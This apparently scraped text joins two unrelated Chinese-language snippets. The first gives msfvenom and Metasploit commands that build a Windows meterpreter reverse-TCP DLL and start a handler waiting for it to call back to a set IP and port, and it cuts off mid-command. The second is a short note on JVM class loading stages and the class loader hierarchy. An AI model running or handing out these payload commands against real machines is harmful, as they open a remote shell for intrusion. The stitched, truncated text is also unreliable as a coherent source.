第一步:生成dll文件 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.106.10 LPORT=443 -f dll -o /tmp/reverse_tcp.dll 第二步:启动MSF等待回连 use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST 192.168.106.10 set LPORT 443 r
jvm 加载class文件分为装载-链接-初始化三个过程. load -------->link verify prepare resolve ---------->initialize (类加载过程) bootstrap class Loader | | extenstion class loader | | system class Loader | | ----------- user-define user-define class loader class